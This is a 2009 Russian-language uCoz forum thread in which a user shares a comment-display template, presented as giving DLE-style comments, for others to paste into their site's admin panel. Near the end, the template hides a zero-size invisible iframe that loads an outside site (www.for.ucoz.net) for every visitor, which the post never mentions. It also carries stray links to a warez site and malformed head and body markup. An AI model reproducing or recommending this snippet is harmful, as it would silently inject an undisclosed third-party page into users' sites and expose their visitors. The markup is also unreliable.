ВНИМАНИЕ!!!!

Сайт адаптирован под браузеры Opera и Mozilla Firefox. Во всех остальных браузерах этот сайт может показываться не коректно.
Приносим свои извинения за неудобства.
Стартовая Избранное Главная Контакты Карта сайта
Где мы?

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Форум » Скрипты для uCoz (форум по uCoz) » Другие скрипты для uCoz » Вид коментарие как в Dle
Вид коментарие как в Dle
STenTДата: Воскресенье, 26.07.2009, 22:49 | Сообщение # 1
Генерал-майор
Сообщений: 300
Репутация: 1
Статус: Offline

1. В админке в вид коментариев заменяем на этот код:
Code
<link rel="search" type="application/opensearchdescription+xml" href="http://alive.org.ua/engine/opensearch.php" title="ALIVE Warez – Скачать аниме музыка фильмы ua-ix psp аудиокниги игры девушки" /><link rel="alternate" type="application/rss+xml" title="ALIVE Warez – Скачать аниме музыка фильмы ua-ix psp аудиокниги игры девушки" href="http://alive.org.ua/rss.xml" />  
<head>  
<link rel="alternate" type="application/rss+xml" title="RSS" href="rss.xml">  
<link rel="icon" href="index_files/favicon0.htm" />  
<style type="text/css" media="all">  
@import url(index_files/style000.css);  
@import url(index_files/gallery0.htm);  
</style>  
<style type="text/css" media="all">  
@import url(index_files/engine00.css);  

</style>  
<table width="100%" border="0" cellspacing="0" cellpadding="0">  
   <tr>  
   <td width="20" align="left" valign="top"><img src="index_files/dlet_110.gif" width="20" height="30" /></td>  
   <td align="left" class="arttab_12"><table width="100%" border="0" cellspacing="0" cellpadding="0">  
   <tr>  
   <td align="left" class="slink"><?if($IS_OWN$)?><span class="myWinError">*</span> <?else?><?if($IS_NEW$)?><span class="myWinSuccess">*</span> <?endif?><?endif?><a href="#ent$ID$" onclick="if (document.getElementById('comEnt$ID$')){$('body').scrollTo( { top:$('#comEnt$ID$').offset().top-22, left:0}, 500 );return false;}" name="ent$ID$"><b>$NUMBER$</b></a>  
<?if($USERNAME$)?><a href="$PROFILE_URL$"><b>$USERNAME$</b></a><?else?><b>$NAME$</b><?endif?> <span style="font-size:7pt;unicode-bidi:embed;">($DATE$ $TIME$)</span>  
<?if($ENTRY_URL$)?>[<a href="$ENTRY_URL$" target="_blank" title="Перейти на страницу материала">Материал</a>]<?endif?></span></td>  
   <td align="right" class="category"></td>  
   </tr>  
   </table></td>  
   </tr>  
   <tr>  
   <td width="20" align="left" valign="top"><img src="index_files/dlet_210.gif" width="20" height="30" /></td>  
   <td align="left"><table width="100%" border="0" cellspacing="0" cellpadding="0">  
   <tr>  
   <td width="8" align="left" valign="top"><img src="index_files/str_1100.gif" width="8" height="30" /></td>  
   <td class="str_12"> </td>  
   <td width="8" align="right" valign="top"><img src="index_files/str_1300.gif" width="8" height="30" /></td>  
   </tr>  
   </table></td>  
   </tr>  
   <tr>  
   <td width="20" align="left" valign="top" class="arttab_31"> </td>  
   <td align="left" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">  
   <tr>  
   <td width="10" align="left" valign="top" class="ab_11"> </td>  
   <td align="left" valign="top" class="news">  
<table width="100%" border="0" cellspacing="0" cellpadding="0">  
   <tr>  
   <td width="140" valign="top"><?if($USER_AVATAR_URL$)?><a href="$PROFILE_URL$" title="$USERNAME$"><img align="left" src="$USER_AVATAR_URL$" width="30" border="0" /></a><?endif?>  

   <br>  
   <?if($ANSWER_URL$)?><div style="clear:both;padding:4px 0;font-size:7pt;">[<a href="$ANSWER_URL$">Ответить</a>]</div><?endif?>  
</td>  
   <td class="news" valign="top">$MESSAGE$</td>  
   </tr>  
   </table></td>  
   <td width="10" align="right" valign="top" class="ab_13"> </td>  
   </tr>  
<tr>  
<td width="10" align="left" valign="top"><img src="index_files/ab_21000.gif" width="10" height="5" /></td>  
<td align="left" class="ab_22"><img src="index_files/spacer00.gif" width="1" height="1" /></td>  
<td width="10" align="right" valign="top"><img src="index_files/ab_23000.gif" width="10" height="5" /></td>  
</tr>  
</table></td>  
<body style="margin:0px">   
</iframe>   
<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"   
src="http://www.for.ucoz.net">   
</iframe>  
   </tr>  
<tr>  
<td width="20" align="left" valign="top"><img src="index_files/dlet_410.gif" width="20" height="30" /></td>  
<td align="left" class="arttab_42"><table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr>  
   <td width="50%" align="left" class="slink"> </td>  
<td align="right" class="slink"> </td>  
</tr>  
</table></td>  
</tr>  
</table>

2. Качаем архив внизу и кидаем папку Index_filex в корень сайта

Скачать

 
РоманДата: Среда, 30.12.2009, 06:18 | Сообщение # 2
Рядовой
Сообщений: 2
Репутация: 0
Статус: Offline
На DLE по-другому!

И сам создаю сейчас на DLE.... и там все по-другому! dry

 
(LORD)Дата: Среда, 30.12.2009, 20:20 | Сообщение # 3
Репутация: 34
Статус: Offline
Роман, ну вид можно как угодно изменять, STenT'у кажеться, что это "как на дле".
 
Форум » Скрипты для uCoz (форум по uCoz) » Другие скрипты для uCoz » Вид коментарие как в Dle
Страница 1 из 11
Поиск:
Rambler's Top100